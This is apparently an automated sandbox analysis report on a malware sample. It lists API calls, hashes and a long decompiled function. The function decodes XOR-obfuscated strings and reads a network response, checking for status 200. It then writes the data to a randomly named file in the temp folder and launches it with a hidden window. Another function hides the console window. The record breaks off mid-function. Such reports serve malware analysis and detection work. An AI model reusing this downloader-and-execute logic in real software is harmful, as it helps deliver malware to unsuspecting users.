0x00404d5f
0x00404d62
0x00404d69
0x00404d6e
0x00000000
0x00404d6e
0x00404cf0
0x00404cf0
0x00404cf3
0x00404cfa
0x00404cff
0x00404d06
0x00404d0b
0x00404d0d
0x00404d1f
0x00404d25
0x00404d29
0x00404d2f
0x00404d36
0x00404d3b
0x00404d42
0x00404d3d
0x00404d3d
0x00404d3d
0x00404d45
0x00404d48
0x00404d50
0x00404e8c
0x00404e8c
0x00404e8c
0x00404d1f
0x00404e95
0x00404ea2

APIs

PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 00404D17
EnterCriticalSection.KERNEL32(?), ref: 00404D29
WSARecv.WS2_32(?,?,?,00000000,?,?,00000000), ref: 00404D95
WSAGetLastError.WS2_32 ref: 00404D9E
PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000002,?), ref: 00404DF9
EnterCriticalSection.KERNEL32(?), ref: 00404E0B
PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000002,?), ref: 00404E56
EnterCriticalSection.KERNEL32(?), ref: 00404E64
LeaveCriticalSection.KERNEL32(?), ref: 00404E8C

Strings

@, xrefs: 00404DA6

Memory Dump Source

Source File: 00000000.00000002.508325128.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.508362505.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xw0K5Lahxz.jbxd

Similarity

API ID: CriticalSection$CompletionEnterPostQueuedStatus$ErrorLastLeaveRecv
String ID: @
API String ID: 146848172-2766056989
Opcode ID: 19ebebe10a3493006b7f719333d567d96c1f0295d30e825843afad980d2a47a5
Instruction ID: ef84414565ad493f9f516649173809a78f92d4d9ad66c5a47db26b3a72d50e0b
Opcode Fuzzy Hash: 19ebebe10a3493006b7f719333d567d96c1f0295d30e825843afad980d2a47a5
Instruction Fuzzy Hash: 7C514AB0600705EFDB20CF55D988B9ABBF4FF84304F10856AEA06A7691D7B8E944CBD5

Uniqueness

Uniqueness Score: -1.00%

Function 004085B0 Relevance: 17.6, APIs: 5, Strings: 4, Instructions: 1887COMMON

Download Yara Rule

APIs

GetConsoleWindow.KERNELBASE(00000000,149E0ABF), ref: 004085FD
ShowWindow.USER32(00000000), ref: 00408604

Strings

71<, xrefs: 00408A58
YA, xrefs: 0040955F
<83, xrefs: 00408C32
Error: %d, xrefs: 00408A3C, 00409398, 004093B0

Memory Dump Source

Source File: 00000000.00000002.508325128.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.508362505.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xw0K5Lahxz.jbxd

Similarity

API ID: Window$ConsoleShow
String ID: 71<$<83$Error: %d$YA
API String ID: 3999960783-2713427950
Opcode ID: 9ce43082cf9906ee9b88ffdfa41f1856232ecbd8467bd2b1769f4a94ab7bcc09
Instruction ID: 9ff051f56d24bab04c93d2af45ef43416d9c194c7fad7c2110ac6963ba47e09e
Opcode Fuzzy Hash: 9ce43082cf9906ee9b88ffdfa41f1856232ecbd8467bd2b1769f4a94ab7bcc09
Instruction Fuzzy Hash: 48034975D256498AEB17CB34C8013D9F775AFE7344F10C3AAE844366A3EB3226D68B44

Uniqueness

Uniqueness Score: -1.00%

Function 004057A0 Relevance: 17.0, APIs: 6, Strings: 3, Instructions: 1293
COMMONCrypto

Download Yara Rule

C-Code - Quality: 30%

			E004057A0() {
				intOrPtr _v8;
				char _v16;
				char _v24;
				signed int _v32;
				short _v556;
				signed int _v560;
				signed int _v584;
				WCHAR* _v588;
				WCHAR* _v604;
				signed int _v608;
				WCHAR* _v612;
				WCHAR* _v628;
				signed int _v632;
				WCHAR* _v636;
				char _v652;
				signed int _v656;
				WCHAR* _v660;
				WCHAR* _v676;
				signed int _v680;
				WCHAR* _v684;
				short _v700;
				struct _PROCESS_INFORMATION _v716;
				void* _v788;
				void _v844;
				void* _v860;
				char _v868;
				void* _v876;
				char _v892;
				char _v1064;
				char _v1068;
				struct _STARTUPINFOW _v1140;
				void* _v1212;
				char _v1228;
				char _v1244;
				char _v2468;
				char _v2469;
				char _v2470;
				signed int _v2472;
				char _v2474;
				signed int _v2476;
				signed int _v2480;
				short _v2484;
				char _v2486;
				signed int _v2488;
				signed int _v2492;
				WCHAR* _v2496;
				char _v2508;
				WCHAR* _v2512;
				char _v2516;
				char _v2520;
				char _v2526;
				short _v2528;
				char _v2532;
				intOrPtr _v2536;
				char _v2544;
				char _v2560;
				intOrPtr _v2564;
				char _v2588;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t458;
				signed int _t459;
				signed int _t463;
				char _t464;
				intOrPtr _t475;
				char _t476;
				char _t477;
				void* _t482;
				void* _t483;
				signed int _t485;
				char _t486;
				char _t491;
				short _t492;
				char _t493;
				void* _t498;
				void* _t499;
				void* _t500;
				signed int _t502;
				intOrPtr _t504;
				signed char _t514;
				intOrPtr* _t518;
				signed int _t529;
				intOrPtr _t543;
				signed int _t545;
				signed int _t548;
				signed int _t553;
				void* _t555;
				void* _t568;
				intOrPtr _t579;
				intOrPtr _t581;
				WCHAR* _t583;
				intOrPtr _t585;
				WCHAR* _t593;
				WCHAR* _t596;
				void* _t601;
				intOrPtr _t604;
				intOrPtr _t607;
				intOrPtr _t610;
				intOrPtr _t613;
				WCHAR* _t619;
				signed int _t622;
				signed int _t625;
				intOrPtr _t626;
				signed int _t627;
				signed int _t628;
				WCHAR* _t635;
				signed int _t641;
				short _t642;
				void* _t643;
				void* _t668;
				intOrPtr* _t717;
				signed int _t723;
				intOrPtr _t738;
				intOrPtr _t739;
				char _t740;
				WCHAR* _t741;
				intOrPtr _t742;
				WCHAR* _t745;
				WCHAR* _t746;
				WCHAR* _t747;
				intOrPtr* _t748;
				intOrPtr _t752;
				intOrPtr _t753;
				intOrPtr _t754;
				WCHAR* _t755;
				WCHAR* _t756;
				void* _t757;
				void* _t758;
				intOrPtr* _t760;
				WCHAR* _t764;
				signed int _t765;
				void* _t783;
				signed int _t787;
				signed int _t790;
				signed int _t791;
				signed int _t794;
				signed int _t799;
				signed int _t802;
				signed int _t803;
				signed int _t806;
				intOrPtr* _t816;
				signed int _t817;
				signed int _t818;
				void* _t821;
				signed int _t824;
				signed int _t827;
				signed int _t828;
				signed int _t831;
				signed int _t832;
				signed int _t833;
				signed int _t834;
				intOrPtr _t835;
				void* _t836;
				void* _t837;
				void* _t838;
				void* _t839;
				void* _t840;
				void* _t841;
				void* _t843;
				signed int _t844;
				signed int _t845;
				void* _t846;
				void* _t847;
				void* _t848;
				intOrPtr* _t849;
				signed int _t851;
				signed int _t854;
				signed int _t855;
				void* _t856;
				signed int _t858;
				signed int _t861;
				signed int _t862;
				signed int _t865;
				signed int _t866;
				signed int _t869;
				signed int _t870;
				signed int _t873;
				signed int _t875;
				signed int _t878;
				signed int _t880;
				signed int _t884;
				void* _t885;
				WCHAR* _t887;
				signed int _t889;
				WCHAR* _t891;
				void* _t893;
				signed int _t896;
				void* _t898;
				signed int _t901;
				void* _t903;
				void* _t904;
				void* _t905;
				void* _t906;
				void* _t907;
				void* _t908;
				void* _t909;
				void* _t910;

				_t668 = _t898;
				_t901 = (_t898 - 0x00000008 & 0xfffffff0) + 4;
				_v8 =  *((intOrPtr*)(_t668 + 4));
				_t896 = _t901;
				_push(0xffffffff);
				_push(0x414066);
				_push( *[fs:0x0]);
				_push(_t668);
				_t458 =  *0x41b014; // 0x149e0abf
				_t459 = _t458 ^ _t896;
				_v32 = _t459;
				_push(_t459);
				 *[fs:0x0] =  &_v24;
				_v2480 = 0;
				_v560 = 0;
				_push(0x530);
				_push(0);
				_v16 = 1;
				_push( &_v2468);
				L004139BD();
				_t463 =  *0x4159fc; // 0x209
				_t903 = _t901 - 0xa08 + 0xc;
				_v2472 = _t463;
				_t787 = 0;
				_t464 =  *0x4159fe; // 0x33
				_v2470 = _t464;
				_push(1);
				_v2476 = 0;
				do {
					_t790 = _v2476;
					 *(_t896 + _t790 - 0x99c) =  *(_t896 + _t790 - 0x99c) ^ _t790 - (0xa0a0a0a1 * _t787 >> 0x00000020 >> 0x00000005) * 0x00000033 + 0x00000031;
					_t787 = _t790 + 1;
					_v2476 = _t787;
				} while (_t787 < 3);
				_push( &_v2472);
				_t904 = _t903 - 0x18;
				E0040C5D0(_t668, _t904, _t668 + 8);
				E0040DB70( &_v2468, _t787); // executed
				_v16 = 2;
				_t474 =  *(_v1244 + 4);
				if(( *(_t896 +  *(_v1244 + 4) - 0x4c4) & 0x00000006) != 0) {
					E004014B0(_t474, "Error: %d\n", 1); // executed
					_t904 = _t904 + 8;
				}
				_t880 = 5;
				asm("movq xmm0, [0x415ae0]");
				_t475 =  *0x415ae8; // 0x3c313709
				_t887 =  *0x41e540; // 0x6
				asm("movq [ebp-0x9e4], xmm0");
				_v2536 = _t475;
				if( *0x415aeb == 0) {
					L8:
					_t476 =  *0x415a68; // 0x14677776
					_t791 = 0;
					_v2520 = _t476;
					_t477 =  *0x415a6c; // 0x35
					_v2516 = _t477;
					_v2476 = 0;
					do {
						_t794 = _v2476;
						 *(_t896 + _t794 - 0x9cc) =  *(_t896 + _t794 - 0x9cc) ^ _t794 - (0xa0a0a0a1 * _t791 >> 0x00000020 >> 0x00000005) * 0x00000033 + 0x00000031;
						_t791 = _t794 + 1;
						_v2476 = _t791;
					} while (_t791 < _t880);
					_t482 = E0040D930( &_v1228,  &_v2520);
					_t797 =  >=  ?  *((void*)(_t668 + 0x20)) : _t668 + 0x20;
					_t483 = E0040F3E0(_t482,  >=  ?  *((void*)(_t668 + 0x20)) : _t668 + 0x20,  *((intOrPtr*)(_t668 + 0x30)));
					_t905 = _t904 + 4;
					E0040D930(_t483,  &_v2544);
					_t485 =  *0x415ad4; // 0x383c
					_t799 = 0;
					_v2476 = _t485;
					_t486 =  *0x415ad6; // 0x33
					_v2474 = _t486;
					_v2472 = 0;
					do {
						_t802 = _v2472;
						 *(_t896 + _t802 - 0x9a0) =  *(_t896 + _t802 - 0x9a0) ^ _t802 - (0xa0a0a0a1 * _t799 >> 0x00000020 >> 0x00000005) * 0x00000033 + 0x00000031;
						_t799 = _t802 + 1;
						_v2472 = _t799;
					} while (_t799 < 3);
					_t491 =  *0x415824; // 0x40405d79
					_t803 = 0;
					_v2532 = _t491;
					_t492 =  *0x415828; // 0x160f
					_v2528 = _t492;
					_t493 =  *0x41582a; // 0x37
					_v2526 = _t493;
					_v2472 = 0;
					do {
						_t806 = _v2472;
						 *(_t896 + _t806 - 0x9d8) =  *(_t896 + _t806 - 0x9d8) ^ _t806 - (0xa0a0a0a1 * _t803 >> 0x00000020 >> 0x00000005) * 0x00000033 + 0x00000031;
						_t803 = _t806 + 1;
						_v2472 = _t803;
					} while (_t803 < 7);
					_t498 = E0040D930( &_v1228,  &_v2532);
					_t809 =  >=  ?  *((void*)(_t668 + 8)) : _t668 + 8;
					_t499 = E0040F3E0(_t498,  >=  ?  *((void*)(_t668 + 8)) : _t668 + 8,  *(_t668 + 0x18));
					_t906 = _t905 + 4;
					_t500 = E0040D930(_t499,  &_v2476);
					asm("movups xmm0, [0x41572c]");
					asm("movups [ebp-0x9f4], xmm0");
					asm("psrldq xmm0, 0xf");
					asm("movd eax, xmm0");
					if(_t500 == 0) {
						L20:
						E0040D930( &_v1228,  &_v2560);
						asm("movups xmm0, [0x415aac]");
						_t502 =  *0x415abc; // 0x44494f24
						_v2492 = _t502;
						asm("movups [ebp-0x9c0], xmm0");
						if( *0x415abf == 0) {
							L26:
							E0040D930( &_v1228,  &_v2508);
							asm("movups xmm0, [0x415a90]");
							_t504 =  *0x415aa8; // 0x4c414743
							_v2564 = _t504;
							asm("movups [ebp-0xa10], xmm0");
							asm("movq xmm0, [0x415aa0]");
							asm("movq [ebp-0xa00], xmm0");
							if( *0x415aab == 0) {
								L32:
								E0040D930( &_v1228,  &_v2588);
								_v604 = 0;
								_v588 = 0;
								_v584 = 0xf;
								_v604 = 0;
								_v16 = 3;
								E0040F070( &_v1244,  &_v604);
								__imp__??5?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV01@AAI@Z( &_v560);
								_v676 = 0;
								_v660 = 0;
								_v656 = 0xf;
								_v676 = 0;
								_v16 = 4;
								__imp__?widen@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEDD@Z(0xa);
								E0040F7F0( &_v1244,  &_v676,  *(_v1244 + 4) & 0x000000ff);
								_t907 = _t906 + 4;
								if(( *(_t896 +  *(_v1244 + 4) - 0x4c4) & 0x00000006) == 0) {
									L37:
									_v2469 = 0;
									L38:
									_t514 = _v2480;
									if((_t514 & 0x00000001) == 0) {
										L43:
										if(_v2469 != 0) {
											_t514 = E004014B0(_t514, "Error: %d\n", 2); // executed
											_t907 = _t907 + 8;
										}
										if(_v560 != 0xc8) {
											E004014B0(_t514, "Error: %d\n", 3); // executed
											_t907 = _t907 + 8;
										}
										_v628 = 0;
										_v612 = 0;
										_v608 = 0xf;
										_v628 = 0;
										_v16 = 5;
										while(1) {
											__imp__?widen@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEDD@Z(0xa);
											_t816 =  &_v628;
											_t518 = E0040F7F0( &_v1244, _t816,  *(_v1244 + 4) & 0x000000ff);
											_t880 = _v628;
											_t907 = _t907 + 4;
											if(( *( *((intOrPtr*)( *_t518 + 4)) + _t518 + 0xc) & 0x00000006) != 0) {
												break;
											}
											_t625 =  *0x415764; // 0x323c
											_v2472 = _t625;
											if(_t625 == 0) {
												L52:
												_t849 =  &_v2472;
												_t758 = _t849 + 1;
												do {
													_t626 =  *_t849;
													_t849 = _t849 + 1;
												} while (_t626 != 0);
												_t887 = _v612;
												_t760 =  >=  ? _t880 :  &_v628;
												if(_t887 != _t849 - _t758) {
													continue;
												}
												_t816 =  &_v2472;
												_t887 = _t887 - 4;
												if(_t887 < 0) {
													L58:
													if(_t887 == 0xfffffffc) {
														L67:
														_t627 = 0;
														L68:
														if(_t627 != 0) {
															continue;
														}
														break;
													}
													L59:
													_t628 =  *_t760;
													if(_t628 !=  *_t816) {
														L66:
														asm("sbb eax, eax");
														_t627 = _t628 | 0x00000001;
														goto L68;
													}
													if(_t887 == 0xfffffffd) {
														goto L67;
													}
													_t628 =  *((intOrPtr*)(_t760 + 1));
													if(_t628 !=  *((intOrPtr*)(_t816 + 1))) {
														goto L66;
													}
													if(_t887 == 0xfffffffe) {
														goto L67;
													}
													_t628 =  *((intOrPtr*)(_t760 + 2));
													if(_t628 !=  *((intOrPtr*)(_t816 + 2))) {
														goto L66;
													}
													if(_t887 == 0xffffffff) {
														goto L67;
													}
													_t628 =  *((intOrPtr*)(_t760 + 3));
													if(_t628 ==  *((intOrPtr*)(_t816 + 3))) {
														goto L67;
													}
													goto L66;
												}
												while( *_t760 ==  *_t816) {
													_t760 = _t760 + 4;
													_t816 = _t816 + 4;
													_t887 = _t887 - 4;
													if(_t887 >= 0) {
														continue;
													}
													goto L58;
												}
												goto L59;
											}
											_t851 = 0;
											_v2488 = 0;
											do {
												_t854 = _v2488;
												 *(_t896 + _t854 - 0x99c) =  *(_t896 + _t854 - 0x99c) ^ _t854 - (0xa0a0a0a1 * _t851 >> 0x00000020 >> 0x00000005) * 0x00000033 + 0x00000031;
												_t851 = _t854 + 1;
												_v2488 = _t851;
											} while (_t851 < 2);
											goto L52;
										}
										L004139BD();
										_t907 = _t907 + 8;
										E0040B340( &_v892,  &_v892);
										_v16 = 6;
										__imp__??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z( &_v2468, 0, 0xb0); // executed
										E0040B260( &_v892,  &_v652);
										_v2480 = _v2480 | 0x00000002;
										 *((intOrPtr*)(_t896 +  *((intOrPtr*)(_v892 + 4)) - 0x370)) = 0x4159e8;
										_t263 = _v892 + 4; // 0x4165b8
										_t264 =  *_t263 - 0x68; // 0x416550
										 *((intOrPtr*)(_t896 +  *_t263 - 0x374)) = _t264;
										E0040C0C0( &_v868);
										__imp__??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ();
										__imp__??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ();
										_v16 = 4;
										_t529 = _v608;
										if(_t529 < 0x10) {
											L73:
											_v16 = 3;
											_t817 = _v656;
											if(_t817 < 0x10) {
												L77:
												_v16 = 2;
												_t818 = _v584;
												if(_t818 < 0x10) {
													L82:
													__imp__??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ();
													E0040BA30( &_v2468); // executed
													__imp__??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ();
													_v16 = 7;
													if(_v636 != 0) {
														_v628 = 0;
														_v612 = 0;
														_v608 = 7;
														_v628 = 0;
														_v16 = 8;
														if(GetTempPathW(0x104,  &_v556) == 0) {
															E004014B0(_t533, "Error: %d\n", 4);
															_t907 = _t907 + 8;
															L101:
															_v16 = 9;
															_v2512 = 0;
															_v2496 = 0;
															memcpy( &_v844, 0x415858, 0x1f << 2);
															_t908 = _t907 + 0xc;
															_v2492 = 7;
															_v2512 = 0;
															asm("movsw");
															_t889 = 0;
															_v560 = _v2480 | 0x00000008;
															if( *0x41e540 < 2) {
																do {
																	L105:
																	 *(_t896 + _t889 * 2 - 0x340) =  *(_t896 + _t889 * 2 - 0x340) ^ _t889 - (0xa0a0a0a1 * _t889 >> 0x00000020 >> 0x00000005) * 0x00000033 + 0x00000031;
																	_t889 = _t889 + 1;
																} while (_t889 < 0x3f);
																L106:
																_v604 = 0;
																_t717 =  &_v844;
																_v588 = 0;
																_v584 = 7;
																_t821 = _t717 + 2;
																_v604 = 0;
																do {
																	_t543 =  *_t717;
																	_t717 = _t717 + 2;
																} while (_t543 != 0);
																_t545 = E0040D040(_t668,  &_v604, 0x415896, _t889,  &_v844, _t717 - _t821 >> 1);
																_v16 = 0xa;
																__imp___time64(0);
																__imp___getpid();
																srand(_t545 * _t545);
																_t909 = _t908 + 8;
																E0040C480(_t668, 5);
																_t891 = _v604;
																_t884 = 5;
																do {
																	_t548 = rand();
																	_t723 = _v2496;
																	_t551 =  >=  ? _t891 :  &_v604;
																	_t824 =  *(( >=  ? _t891 :  &_v604) + _t548 % 0x17 * 2) & 0x0000ffff;
																	if(_t723 >= _v2492) {
																		_push(_t824);
																		_v2486 = 0;
																		_push(_v2486);
																		_push(_t723);
																		E0040E150(_t668,  &_v2512, _t884);
																	} else {
																		_t353 = _t723 + 1; // 0x1
																		_v2496 = _t353;
																		_t601 =  >=  ? _v2512 :  &_v2512;
																		 *(_t601 + _t723 * 2) = _t824;
																		 *((short*)(_t601 + 2 + _t723 * 2)) = 0;
																	}
																	_t891 = _v604;
																	_t884 = _t884 - 1;
																} while (_t884 != 0);
																_v16 = 9;
																_t553 = _v584;
																if(_t553 < 8) {
																	L117:
																	_t555 = E0040DD50( &_v676,  &_v628,  &_v2512);
																	_v16 = 0xb;
																	E0040DE70( &_v700, _t555);
																	_t909 = _t909 + 4;
																	_v16 = 0xd;
																	_t827 = _v656;
																	if(_t827 < 8) {
																		L121:
																		_v660 = 0;
																		_v656 = 7;
																		_v676 = 0;
																		_v16 = 0xe;
																		_t828 = _v2492;
																		if(_t828 < 8) {
																			L126:
																			_v2496 = 0;
																			_push(0xb0);
																			_push(0);
																			_v2512 = 0;
																			_push( &_v1068);
																			_v2492 = 7;
																			L004139BD();
																			_t561 =  >=  ? _v700 :  &_v700;
																			E0040B070( &_v1068, _t828,  >=  ? _v700 :  &_v700);
																			 *((intOrPtr*)(_t896 +  *((intOrPtr*)(_v1068 + 4)) - 0x420)) = 0x415808;
																			_t404 = _v1068 + 4; // 0x501c0b1e
																			_t405 =  *_t404 - 0x68; // 0x501c0ab6
																			 *((intOrPtr*)(_t896 +  *_t404 - 0x424)) = _t405;
																			_v16 = 0xf;
																			_t830 =  >=  ? _v652 :  &_v652;
																			E0040F3E0( &_v1068,  >=  ? _v652 :  &_v652, _v636);
																			_t910 = _t909 + 4;
																			_t568 = E0040C9A0( &_v1064);
																			if(_t568 == 0) {
																				__imp__?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z(2, _t568);
																			}
																			_push(0x44);
																			_push(0);
																			_push( &_v1140);
																			L004139BD();
																			_t907 = _t910 + 0xc;
																			_v1140.cb = 0x44;
																			asm("xorps xmm0, xmm0");
																			_v1140.wShowWindow = 0;
																			_t572 =  >=  ? _v700 :  &_v700;
																			asm("movups [ebp-0x2c0], xmm0");
																			CreateProcessW( >=  ? _v700 :  &_v700, 0, 0, 0, 0, 0, 0, 0,  &_v1140,  &_v716);
																			E00406D00( &_v1068);
																			_t831 = _v680;
																			if(_t831 < 8) {
																				L132:
																				_t832 = _v608;
																				_t575 = 0;
																				_v684 = 0;
																				_v680 = 7;
																				_v700 = 0;
																				if(_t832 < 8) {
																					L136:
																					_t833 = _v632;
																					if(_t833 < 0x10) {
																						L140:
																						_t834 =  *(_t668 + 0x1c);
																						_v636 = 0;
																						_v632 = 0xf;
																						_v652 = 0;
																						if(_t834 < 0x10) {
																							L144:
																							_t835 =  *((intOrPtr*)(_t668 + 0x34));
																							 *(_t668 + 0x18) = 0;
																							 *(_t668 + 0x1c) = 0xf;
																							 *((char*)(_t668 + 8)) = 0;
																							if(_t835 < 0x10) {
																								goto L149;
																							}
																							_t738 =  *((intOrPtr*)(_t668 + 0x20));
																							_t835 = _t835 + 1;
																							_t577 = _t738;
																							if(_t835 < 0x1000) {
																								goto L148;
																							}
																							_t738 =  *((intOrPtr*)(_t738 - 4));
																							_t835 = _t835 + 0x23;
																							if(_t577 <= 0x1f) {
																								goto L148;
																							}
																							goto L147;
																						}
																						_t739 =  *((intOrPtr*)(_t668 + 8));
																						_t836 = _t834 + 1;
																						_t579 = _t739;
																						if(_t836 < 0x1000) {
																							L143:
																							_push(_t836);
																							_t575 = E00412FD5(_t579, _t739);
																							_t907 = _t907 + 8;
																							goto L144;
																						}
																						_t738 =  *((intOrPtr*)(_t739 - 4));
																						_t835 = _t836 + 0x23;
																						_t577 = _t579 - _t738 + 0xfffffffc;
																						if(_t579 - _t738 + 0xfffffffc > 0x1f) {
																							goto L147;
																						}
																						goto L143;
																					}
																					_t740 = _v652;
																					_t837 = _t833 + 1;
																					_t581 = _t740;
																					if(_t837 < 0x1000) {
																						L139:
																						_push(_t837);
																						_t575 = E00412FD5(_t581, _t740);
																						_t907 = _t907 + 8;
																						goto L140;
																					}
																					_t738 =  *((intOrPtr*)(_t740 - 4));
																					_t835 = _t837 + 0x23;
																					_t577 = _t581 - _t738 + 0xfffffffc;
																					if(_t581 - _t738 + 0xfffffffc > 0x1f) {
																						goto L147;
																					}
																					goto L139;
																				}
																				_t741 = _v628;
																				_t838 = 2 + _t832 * 2;
																				_t583 = _t741;
																				if(_t838 < 0x1000) {
																					L135:
																					_push(_t838);
																					_t575 = E00412FD5(_t583, _t741);
																					_t907 = _t907 + 8;
																					goto L136;
																				}
																				_t738 =  *((intOrPtr*)(_t741 - 4));
																				_t835 = _t838 + 0x23;
																				_t577 = _t583 - _t738 + 0xfffffffc;
																				if(_t583 - _t738 + 0xfffffffc > 0x1f) {
																					goto L147;
																				}
																				goto L135;
																			} else {
																				_t742 = _v700;
																				_t839 = 2 + _t831 * 2;
																				_t585 = _t742;
																				if(_t839 < 0x1000) {
																					L131:
																					_push(_t839);
																					E00412FD5(_t585, _t742);
																					_t907 = _t907 + 8;
																					goto L132;
																				}
																				_t738 =  *((intOrPtr*)(_t742 - 4));
																				_t835 = _t839 + 0x23;
																				_t577 = _t585 - _t738 + 0xfffffffc;
																				if(_t585 - _t738 + 0xfffffffc > 0x1f) {
																					L147:
																					__imp___invalid_parameter_noinfo_noreturn();
																					L148:
																					_push(_t835);
																					_t575 = E00412FD5(_t577, _t738);
																					L149:
																					 *[fs:0x0] = _v24;
																					_pop(_t885);
																					_pop(_t893);
																					return E00412A1E(_t575, _t668, _v32 ^ _t896, _t835, _t885, _t893);
																				}
																				goto L131;
																			}
																		}
																		_t745 = _v2512;
																		_t828 = 2 + _t828 * 2;
																		_t590 = _t745;
																		if(_t828 < 0x1000) {
																			L125:
																			_push(_t828);
																			E00412FD5(_t590, _t745);
																			_t909 = _t909 + 8;
																			goto L126;
																		}
																		_t745 =  *(_t745 - 4);
																		_t828 = _t828 + 0x23;
																		if(_t590 <= 0x1f) {
																			goto L125;
																		}
																		L124:
																		__imp___invalid_parameter_noinfo_noreturn();
																		goto L125;
																	}
																	_t746 = _v676;
																	_t840 = 2 + _t827 * 2;
																	_t593 = _t746;
																	if(_t840 < 0x1000) {
																		L120:
																		_push(_t840);
																		E00412FD5(_t593, _t746);
																		_t909 = _t909 + 8;
																		goto L121;
																	}
																	_t745 =  *(_t746 - 4);
																	_t828 = _t840 + 0x23;
																	_t590 = _t593 - _t745 + 0xfffffffc;
																	if(_t593 - _t745 + 0xfffffffc > 0x1f) {
																		goto L124;
																	}
																	goto L120;
																}
																_t841 = 2 + _t553 * 2;
																_t747 = _t891;
																_t596 = _t747;
																if(_t841 < 0x1000) {
																	L116:
																	_push(_t841);
																	E00412FD5(_t596, _t747);
																	_t909 = _t909 + 8;
																	goto L117;
																}
																_t745 =  *(_t747 - 4);
																_t828 = _t841 + 0x23;
																_t590 = _t596 - _t745 + 0xfffffffc;
																if(_t596 - _t745 + 0xfffffffc > 0x1f) {
																	goto L124;
																}
																goto L116;
															}
															asm("movaps xmm4, [0x415af0]");
															asm("movaps xmm3, [0x415b60]");
															asm("movaps xmm5, [0x415b20]");
															asm("movaps xmm7, [0x415b30]");
															asm("movd xmm6, eax");
															asm("o16 nop [eax+eax]");
															do {
																asm("movd xmm0, esi");
																asm("pshufd xmm2, xmm0, 0x0");
																asm("paddd xmm2, xmm4");
																asm("movaps xmm1, xmm2");
																asm("movaps xmm0, xmm2");
																asm("punpckldq xmm1, xmm2");
																asm("punpckhdq xmm0, xmm2");
																asm("pmuludq xmm1, xmm3");
																asm("pmuludq xmm0, xmm3");
																asm("shufps xmm1, xmm0, 0xdd");
																asm("psrld xmm1, xmm6");
																asm("pmulld xmm1, xmm5");
																asm("psubd xmm2, xmm1");
																asm("pshuflw xmm0, xmm2, 0xd8");
																asm("pshufhw xmm0, xmm0, 0xd8");
																asm("pshufd xmm1, xmm0, 0xd8");
																asm("movq xmm0, xmm7");
																asm("paddw xmm1, xmm0");
																asm("movq xmm0, [ebp+esi*2-0x340]");
																asm("pxor xmm1, xmm0");
																asm("movd xmm0, eax");
																asm("movq [ebp+esi*2-0x340], xmm1");
																asm("pshufd xmm2, xmm0, 0x0");
																asm("paddd xmm2, xmm4");
																asm("movaps xmm1, xmm2");
																asm("movaps xmm0, xmm2");
																asm("punpckldq xmm1, xmm2");
																asm("punpckhdq xmm0, xmm2");
																asm("pmuludq xmm1, xmm3");
																asm("pmuludq xmm0, xmm3");
																asm("shufps xmm1, xmm0, 0xdd");
																asm("psrld xmm1, xmm6");
																asm("pmulld xmm1, xmm5");
																asm("psubd xmm2, xmm1");
																asm("pshuflw xmm0, xmm2, 0xd8");
																asm("pshufhw xmm0, xmm0, 0xd8");
																asm("pshufd xmm1, xmm0, 0xd8");
																asm("movq xmm0, xmm7");
																asm("paddw xmm1, xmm0");
																asm("movq xmm0, [ebp+esi*2-0x338]");
																asm("pxor xmm1, xmm0");
																asm("movq [ebp+esi*2-0x338], xmm1");
																_t889 = _t889 + 8;
															} while (_t889 < 0x38);
															if(_t889 >= 0x3f) {
																goto L106;
															}
															goto L105;
														}
														_t748 =  &_v556;
														_t843 = _t748 + 2;
														do {
															_t604 =  *_t748;
															_t748 = _t748 + 2;
														} while (_t604 != 0);
														E0040D040(_t668,  &_v628, _t880, _t887,  &_v556, _t748 - _t843 >> 1);
														goto L101;
													}
													_t844 = _v632;
													if(_t844 < 0x10) {
														L87:
														_t845 =  *(_t668 + 0x1c);
														_v636 = 0;
														_v632 = 0xf;
														_v652 = 0;
														if(_t845 < 0x10) {
															L91:
															_t835 =  *((intOrPtr*)(_t668 + 0x34));
															 *(_t668 + 0x18) = 0;
															 *(_t668 + 0x1c) = 0xf;
															 *((char*)(_t668 + 8)) = 0;
															if(_t835 < 0x10) {
																L95:
																_t575 = 0;
																goto L149;
															}
															_t752 =  *((intOrPtr*)(_t668 + 0x20));
															_t835 = _t835 + 1;
															_t607 = _t752;
															if(_t835 < 0x1000) {
																L94:
																_push(_t835);
																E00412FD5(_t607, _t752);
																goto L95;
															}
															_t738 =  *((intOrPtr*)(_t752 - 4));
															_t835 = _t835 + 0x23;
															_t577 = _t607 - _t738 + 0xfffffffc;
															if(_t607 - _t738 + 0xfffffffc > 0x1f) {
																goto L147;
															}
															goto L94;
														}
														_t753 =  *((intOrPtr*)(_t668 + 8));
														_t846 = _t845 + 1;
														_t610 = _t753;
														if(_t846 < 0x1000) {
															L90:
															_push(_t846);
															E00412FD5(_t610, _t753);
															_t907 = _t907 + 8;
															goto L91;
														}
														_t738 =  *((intOrPtr*)(_t753 - 4));
														_t835 = _t846 + 0x23;
														_t577 = _t610 - _t738 + 0xfffffffc;
														if(_t610 - _t738 + 0xfffffffc > 0x1f) {
															goto L147;
														}
														goto L90;
													}
													_t754 = _v652;
													_t847 = _t844 + 1;
													_t613 = _t754;
													if(_t847 < 0x1000) {
														L86:
														_push(_t847);
														E00412FD5(_t613, _t754);
														_t907 = _t907 + 8;
														goto L87;
													}
													_t738 =  *((intOrPtr*)(_t754 - 4));
													_t835 = _t847 + 0x23;
													_t577 = _t613 - _t738 + 0xfffffffc;
